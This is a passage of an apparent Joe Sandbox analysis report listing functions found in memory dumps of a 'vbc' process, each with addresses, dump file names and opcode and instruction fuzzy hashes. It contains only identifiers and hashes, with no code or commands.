                                                                                                    • Opcode ID: c95fcb95c84444a1f7d86a8b20fe09b94e4e1e510af79ce1a8c6e253e8286652
                                                                                                    • Instruction ID: bb76a35a661b8952ee3016b0d74949458484e130d95a7737de1352c321350ebf
                                                                                                    • Opcode Fuzzy Hash: c95fcb95c84444a1f7d86a8b20fe09b94e4e1e510af79ce1a8c6e253e8286652
                                                                                                    • Instruction Fuzzy Hash: 34C0125400D2C41FC38293208CA88617F24CE5310531841CB9840CB1A3C9169A0BD315
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F7250 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9402ed7faefe42bf1429a92897155a13ffb1a3458317c602295ebd27d708d786
                                                                                                    • Instruction ID: cc3cce7bd85634385cd9c9b8bfc869086a72ea98fb529a3eaacbe811af7dfb57
                                                                                                    • Opcode Fuzzy Hash: 9402ed7faefe42bf1429a92897155a13ffb1a3458317c602295ebd27d708d786
                                                                                                    • Instruction Fuzzy Hash: 05C0802032D5404FC345C7248D66589BF50EF85104318C4DEDC446F147E531990BC755
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FF218 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0679f7212521cd5264e7c17f41fd036da92c730cab1c01398034e3c334c6c1f4
                                                                                                    • Instruction ID: 3e7e10e25a6aa064ed79243b47ce21afdcd07112da575bf6fe3042a58870e74d
                                                                                                    • Opcode Fuzzy Hash: 0679f7212521cd5264e7c17f41fd036da92c730cab1c01398034e3c334c6c1f4
                                                                                                    • Instruction Fuzzy Hash: A5D0C96561E7C00FD346C6208C72A45BF609B5320DB1AC4DED984CB2A7E625880BC715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FC481 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c36a180a8063fff27642534e7ffa6a6b69830600369a5d2ed554985e7c4f41ca
                                                                                                    • Instruction ID: 99a1165b755f9aeb6fb88bfade1a598f840a5f8bd59661edd4a9f4104bae0b94
                                                                                                    • Opcode Fuzzy Hash: c36a180a8063fff27642534e7ffa6a6b69830600369a5d2ed554985e7c4f41ca
                                                                                                    • Instruction Fuzzy Hash: 83C04CE055E3C56FD706D7604CA58C56F74695321470A41CBA0D4CA0E3CA8D995BC36A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F26E8 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 07a765567adacc90f3c5db1af953a0a472a1b10383b77d0690460db975e02fe9
                                                                                                    • Instruction ID: 43062542c46c51313381f688dd19a844621cb19ae53aa49083406a3b418c4898
                                                                                                    • Opcode Fuzzy Hash: 07a765567adacc90f3c5db1af953a0a472a1b10383b77d0690460db975e02fe9
                                                                                                    • Instruction Fuzzy Hash: 84D0C92021E2D09BC7A6CA648D627897F719F42145F58C4DFD9889A187E535890AC355
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FF761 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9bfe588a7491d9d47889dc07bfba30ba3ab62fd478d9e032c3e5956e9d9df72
                                                                                                    • Instruction ID: faf43d2d4960f5aa7e6c63e7478db54f59f4d6bffee9557b3ab8c0d644d53a51
                                                                                                    • Opcode Fuzzy Hash: c9bfe588a7491d9d47889dc07bfba30ba3ab62fd478d9e032c3e5956e9d9df72
                                                                                                    • Instruction Fuzzy Hash: 56D0C99014E2C05FC30787608CA58457F742D8311431981CED0948B097C65A562AC363
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00541100 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                    • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                                                    • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                    • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054F2F4 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a2440cc9a854e4fd9820710708cb001593d1779856b8f3a54e4db084c1751038
                                                                                                    • Instruction ID: 832c6ca83f478fa100a2087bc939e57fde796e20630457323a88a15d6a3c13de
                                                                                                    • Opcode Fuzzy Hash: a2440cc9a854e4fd9820710708cb001593d1779856b8f3a54e4db084c1751038
                                                                                                    • Instruction Fuzzy Hash: 38C080313082154BC794D719E4015D53761DACA5107458D64D0C5C2615D62058075740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00526CD8 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                    • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                                                    • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                                                    • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484A180 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 87209333650e114a0494dd745e19d2d0d8bf961a17cd4e9450c319ab4d12ca19
                                                                                                    • Instruction ID: 4b78ab0f93aadbb2d2ac397e4558b9885758698e4600fe931685a82c3f063e05
                                                                                                    • Opcode Fuzzy Hash: 87209333650e114a0494dd745e19d2d0d8bf961a17cd4e9450c319ab4d12ca19
                                                                                                    • Instruction Fuzzy Hash: DEC04C1854E7D81FCB1383345C69084BF21E84356530A47DBD880CB4A7C658584ED77A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484D1F0 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9839c38a8325ea0c8eb15540797d661086d251189268390a97111fd0e131aee2
                                                                                                    • Instruction ID: 9d88126007f71914a267d23ff48d977a14fff94b77659fe277064d51ed566727
                                                                                                    • Opcode Fuzzy Hash: 9839c38a8325ea0c8eb15540797d661086d251189268390a97111fd0e131aee2
                                                                                                    • Instruction Fuzzy Hash: 22C0025115E6D85ED31297604EA8460BF60A9A311530A42DB9CA58A0F3CA096A6AE356
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484CA41 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b110c558720893de371331184a7d789d0b6cd11bcba9a954f46b44c5ae1b3b77
                                                                                                    • Instruction ID: 3adda3ae472412082ad8f43901fb42bc079929947ba13b277e90487719fe4453
                                                                                                    • Opcode Fuzzy Hash: b110c558720893de371331184a7d789d0b6cd11bcba9a954f46b44c5ae1b3b77
                                                                                                    • Instruction Fuzzy Hash: E8C0128000FBC87FC7038B604C60494BF30AD4300470987CBD8D58A093C75AAA1ED36A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484F730 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bd69213bb7e9145052276d555e3fceda25c1f9165096c078e055c40c2324ff5b
                                                                                                    • Instruction ID: 1760402d076b8ff1a51e7135779639944c1c550ecc228461231db7694949dcb5
                                                                                                    • Opcode Fuzzy Hash: bd69213bb7e9145052276d555e3fceda25c1f9165096c078e055c40c2324ff5b
                                                                                                    • Instruction Fuzzy Hash: ECC012C100EBC51FC78382A04CA0490BF20AC6309030B41DBC4A09A0A3CB0A2A19C306
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054D740 Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5a4f02e61ea9f9a46b8eba0c21d813f6023533808b3f0cf8f0c4ac9f8ff8f25c
                                                                                                    • Instruction ID: fb23fe2ddb5fb3d0f4b1acbcf50ac7aaf6d01f56d0fe6a53bcbe4eba309e3d72
                                                                                                    • Opcode Fuzzy Hash: 5a4f02e61ea9f9a46b8eba0c21d813f6023533808b3f0cf8f0c4ac9f8ff8f25c
                                                                                                    • Instruction Fuzzy Hash: 14C08077C485845FCB018731B4587453F115F66259F1D00DDD44ED7193E1020C02C740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528DD1 Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3f418da724df37cbf3dde99f1f03263ee43592ad55f85a86101193edb11cf442
                                                                                                    • Instruction ID: 39284b61610c6bcd70f33275f39c3b064c74a0cff51cdebda232f8225775096b
                                                                                                    • Opcode Fuzzy Hash: 3f418da724df37cbf3dde99f1f03263ee43592ad55f85a86101193edb11cf442
                                                                                                    • Instruction Fuzzy Hash: 9DC0029019E7C5AEC30687604C71896AF796D9312430941CBE0D5CA0E7C60D5A2AC366
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F0C30 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7fbcb63472128d0a210ea9036b863d07e77fffc7870fc97c2ca3b239b1a2b54e
                                                                                                    • Instruction ID: 39a73c9bbe3c0ed7792a8b53aabb37d2f4b2636dfcf14e288d4917beaa58d51d
                                                                                                    • Opcode Fuzzy Hash: 7fbcb63472128d0a210ea9036b863d07e77fffc7870fc97c2ca3b239b1a2b54e
                                                                                                    • Instruction Fuzzy Hash: 35C04C753415025BD354C618C851A26F7A6DFD8315F14C47D6449C7759DE36DC03D614
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F2630 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 130f1f553f15334beeea54fc4bc6fcd98be254cf88c54d29dd6662ba0a658a6d
                                                                                                    • Instruction ID: d9ab00dd5871dd1f0d27b79fd166a8fe4c47ab1596caddffe0e3f1f530fe3259
                                                                                                    • Opcode Fuzzy Hash: 130f1f553f15334beeea54fc4bc6fcd98be254cf88c54d29dd6662ba0a658a6d
                                                                                                    • Instruction Fuzzy Hash: 38C0125010E3C9AFC7038B609C219987F303E5311170A82CBE8949B0E3C7248B29C382
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FCFC1 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ee225f895061d687ad9e48d95df3f537cf76ef9146dd1557c45b6eb8c8811ebb
                                                                                                    • Instruction ID: 782db4ad4aad98c90a1ca46024b0be3df964b11cb2a65514a78dc4947c564f5c
                                                                                                    • Opcode Fuzzy Hash: ee225f895061d687ad9e48d95df3f537cf76ef9146dd1557c45b6eb8c8811ebb
                                                                                                    • Instruction Fuzzy Hash: E7C0129250E7C00FC31783604CA4408BF702CA300470E04CFC0D2860D7E7089A15C382
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529F31 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 12410ddce9e7d6e7e5be491382211b6520c9ab003f395e3ceec73074ae1dddbd
                                                                                                    • Instruction ID: b50a4a5ff24f2eef1f64f2ad6d23c1a1428d1bb3dc0ffda22c60bdac82c71d86
                                                                                                    • Opcode Fuzzy Hash: 12410ddce9e7d6e7e5be491382211b6520c9ab003f395e3ceec73074ae1dddbd
                                                                                                    • Instruction Fuzzy Hash: 55C02BA020D5808FC30283288C707817F517F52102B8940DAA090C20C3D705CD14C3C0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 048498AF Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 513a026e312de7652093fe31df926ae3af624776ef31b758a17c19e8edab9174
                                                                                                    • Instruction ID: b71d24b479fbb2baae35727dd832bedbcf2ada87415b250312d0c9cb29c1b143
                                                                                                    • Opcode Fuzzy Hash: 513a026e312de7652093fe31df926ae3af624776ef31b758a17c19e8edab9174
                                                                                                    • Instruction Fuzzy Hash: AFD0C96540E7C46FC712977158257457F306B82304F4A88EAD0859A0E786151118EF12
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F40B0 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 26ec59e49ef5dde4f6c43826f83de71f8b533ebd8684d345ab8c96d76ccfeee2
                                                                                                    • Instruction ID: 4c0104aa7dec58de773f39b622ac78109551ff355dc375ca562f7801c2fe0938
                                                                                                    • Opcode Fuzzy Hash: 26ec59e49ef5dde4f6c43826f83de71f8b533ebd8684d345ab8c96d76ccfeee2
                                                                                                    • Instruction Fuzzy Hash: 0FC08CC150E2C00FC3138B20CDB0040BF202EA3108B0800DF98A48A0D3EB420D26C386
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F6168 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F69D8 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9280 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FE428 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FADA0 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F4631 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c54491fb04b815e2ac7199ee6e9de162fd7e125a0070386989218c54d55940e2
                                                                                                    • Instruction ID: 5fa79ac1dda5310e89caf5644d83e620a1572b40e614e8cf976d3fcdba617ee7
                                                                                                    • Opcode Fuzzy Hash: c54491fb04b815e2ac7199ee6e9de162fd7e125a0070386989218c54d55940e2
                                                                                                    • Instruction Fuzzy Hash: 38C08C8111E6D04ED30287B04D74240BF302F53008B0840CBC0E84A0E3CA040522E359
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FDFD0 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                    • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                    • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005449D8 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
